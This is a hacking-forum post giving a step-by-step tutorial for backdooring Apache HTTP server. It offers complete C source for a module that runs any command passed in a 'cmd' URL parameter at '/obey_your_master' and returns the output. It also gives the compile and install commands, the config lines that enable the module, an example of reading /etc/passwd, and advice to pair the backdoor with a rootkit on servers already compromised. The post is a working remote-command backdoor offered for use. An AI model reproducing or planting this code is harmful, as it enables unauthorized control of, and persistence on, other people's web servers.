XDNET
Вернуться   Hacket.Ru - Ethical Hacking - Cyber Security - Penetration Testing > UNDERGROUND > International Zone > Motherfucker Section

Motherfucker Section hacking and webhacking Section

Ответ
Опции просмотра Опции темы  
Старый 01.02.2018, 23:14   #1
Супер-модератор
 
Аватар для Que$t
Группа: Member
 
Регистрация: 29.10.2017
Возраст: 29
Сообщений: 346
Репутация: 127
По умолчанию Backdooring Apache HTTP server Tutorial

[Introduction]
A few days ago I posted a tutorial about Backdooring OpenSSH-server in witch we downloaded the source code of OpenSSH and edited the source code so that it would always accept the password "master_of_puppets", we backdoored software that is meant for managing servers, now I want to open your mind and show that you can also backdoor software that wasn't necessarily meant for server management and show you another way of backdooring software - writing modules.

[What is Apache HTTP server?]
Apache HTTP server is open-source software used to host web pages.

[Why Apache?]
According to netcraft, Apache has the largest "Market share of active sites" that means it's commonly used so if you gain access to a server that hosts websites it will most likely use apache.



[What exactly are we going to do?]

Download apache's development headers
Create our own module that will take requests like "/obey_your_master?cmd=<some command here>" and print out the output of our commands
Install the module

[The process]

{Installing apache's development headers}
Since I'm on Debian I'll be using the aptitude package manager

Код:
apt-get install apache2-dev
{Writing the module}
Let's create a separate directory for our project and start writing code in our favourite text editor (I'll use nano)

Код:
mkdir bd_module
cd bd_module
nano bd_module.c
So the first thing we need to do is include apache's headers:
Код:
#include <stdio.h>
#include "apr_hash.h"
#include "ap_config.h"
#include "ap_provider.h"
#include "httpd.h"
#include "http_core.h"
#include "http_config.h"
#include "http_log.h"
#include "http_protocol.h"
#include "http_request.h"
Now's the fun part, let's write the handler for our module, this is the function that will handle our request.
In our handler we'll check if we should handle the request, get the cmd variable from the URL, if cmd is not specified we'll set it to the command "uname -a" that gives us a bunch of information about the OS, than execute the command and print the output as a response.

Код:
static int oym_handler(request_rec *r)
{
    if(!r->handler || strcmp(r->handler, "obey_your_master-handler")) return(DECLINED); // Check if we need to execute this code

    /* Variables */
    apr_table_t*GET;           // Create a var table
    ap_args_to_table(r, &GET); // Read data from get
    FILE *fp;                  // We'll use this for popen
    char buff[1024];           // Buffer for output

    ap_set_content_type(r, "text/plain"); // Tell browsers that response is in plain text

    /* Get the "cmd" key from the query string, if any. */
    const char *cmd = apr_table_get(GET, "cmd");

    /* If no key was returned, we will set a default value instead. */
    if (!cmd) cmd = "uname -a";

    /* Open the command for reading. */
    fp = popen(cmd, "r");
    if (fp == NULL) {
      ap_rprintf(r, "Failed to run command\n");
      return OK;
    }
    /* Read the output a line at a time - output it. */
    while (fgets(buff, sizeof(buff)-1, fp) != NULL) {
      ap_rprintf(r, "%s", buff);
    }
    return OK;
}
Now let's register our hook and declare

Код:
static void register_hooks(apr_pool_t *pool)
{
    ap_hook_handler(oym_handler, NULL, NULL, APR_HOOK_LAST);
}
module AP_MODULE_DECLARE_DATA   bd_module =
{
    STANDARD20_MODULE_STUFF,
    NULL,               /* Per-directory configuration handler */
    NULL,               /* Merge handler for per-directory configurations */
    NULL,               /* Per-server configuration handler */
    NULL,               /* Merge handler for per-server configurations */
    NULL,               /* Any directives we may have for httpd */
    register_hooks      /* Our hook registering function */
};
And let's put it all together:

Код:
#include <stdio.h>
#include "apr_hash.h"
#include "ap_config.h"
#include "ap_provider.h"
#include "httpd.h"
#include "http_core.h"
#include "http_config.h"
#include "http_log.h"
#include "http_protocol.h"
#include "http_request.h"

/*
==============================================================================
Our module handler:
==============================================================================
*/
static int oym_handler(request_rec *r)
{
    if(!r->handler || strcmp(r->handler, "obey_your_master-handler")) return(DECLINED); // Check if we need to execute this code

    /* Variables */
    apr_table_t*GET;           // Create a var table
    ap_args_to_table(r, &GET); // Read data from get
    FILE *fp;                  // We'll use this for popen
    char buff[1024];           // Buffer for output

    ap_set_content_type(r, "text/plain"); // Tell browsers that response is in plain text

    /* Get the "cmd" key from the query string, if any. */
    const char *cmd = apr_table_get(GET, "cmd");

    /* If no key was returned, we will set a default value instead. */
    if (!cmd) cmd = "uname -a";

    /* Open the command for reading. */
    fp = popen(cmd, "r");
    if (fp == NULL) {
      ap_rprintf(r, "Failed to run command\n");
      return OK;
    }
    /* Read the output a line at a time - output it. */
    while (fgets(buff, sizeof(buff)-1, fp) != NULL) {
      ap_rprintf(r, "%s", buff);
    }
    return OK;
}

/*
==============================================================================
The hook registration function:
==============================================================================
*/
static void register_hooks(apr_pool_t *pool)
{
    ap_hook_handler(oym_handler, NULL, NULL, APR_HOOK_LAST);
}
/*
==============================================================================
Our module name tag:
==============================================================================
*/
module AP_MODULE_DECLARE_DATA   example_module =
{
    STANDARD20_MODULE_STUFF,
    NULL,               /* Per-directory configuration handler */
    NULL,               /* Merge handler for per-directory configurations */
    NULL,               /* Per-server configuration handler */
    NULL,               /* Merge handler for per-server configurations */
    NULL,               /* Any directives we may have for httpd */
    register_hooks      /* Our hook registering function */
};
{Compiling our module}

Код:
apxs -c bd_module.c
{Installing our module}
On a system that has apache's development headers installed you can install modules using "apxs (-i installs the module) (-a enables it) module_name"

Код:
apxs -i -a bd_module.la
But face it: installing apache's development headers for all the systems you own is just stupid, lets do the install the manual way!
First we have to copy our module to the modules directory:

Код:
cp .libs/bd_module.so /usr/lib/apache2/modules/
Now we have to add "LoadModule" and "<Location>" directives to apache's configuration file
So let's open the config file

Код:
nano /etc/apache2/apache2.conf
And add these lines:

Код:
LoadModule bd_module /usr/lib/apache2/modules/bd_module.so
<Location "/obey_your_master">
    SetHandler obey_your_master-handler
</Location>
And the final step is to restart apache:

Код:
systemctl restart apache2
{Testing our module}
Fire up your browser and navigate to "some_sites_address/obey_your_master"
And it works!



Okay so seeing the "uname -a" output is cool and all but lets read the /etc/passwd file like all the 1337 h4x0rs do


And we are done here!


[Final notes]
Congratulations on making trough!
I commented the code and left the comments from the example I totally ripped off from apache's documentation(link is with the sources), but if you still don't understand something please reply to this thread and ask :)
This backdoor executes commands as the user that is configured to run apache so this backdoor should be used with a rootkit or some other method of privilege escalation:




[Sources]
[Ссылки могут видеть только зарегистрированные пользователи. ]
[Ссылки могут видеть только зарегистрированные пользователи. ]
[Ссылки могут видеть только зарегистрированные пользователи. ]
[Ссылки могут видеть только зарегистрированные пользователи. ]

Autor Pikami
Que$t вне форума   Ответить с цитированием
Ответ

Метки
backdooring apache http server


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 
Опции темы
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход

Друзья

Текущее время: 00:15. Часовой пояс GMT +4.


"(c) Hacket.Ru" (c) Hacket.Ru Внимание! Все материалы, находящиеся на сайте, выложены исключительно в образовательных целях. Владельцы сайта не несут ответственность за использование информации в незаконных целях.
Мы не несём никакой ответственности за предоставленные материалы. При копировании информации обратная ссылка обязательна.
Powered by: vBulletin Version 3.8.1
Copyright ©2000 - 2017, vBulletin Solutions, Inc ~ Перевод: zCarot
Remix fluid style from X1mer@ for Hacket.Ru Взлом и Безопасность (c) Hacket.Ru
Время генерации страницы 0.05941 секунды с 14 запросами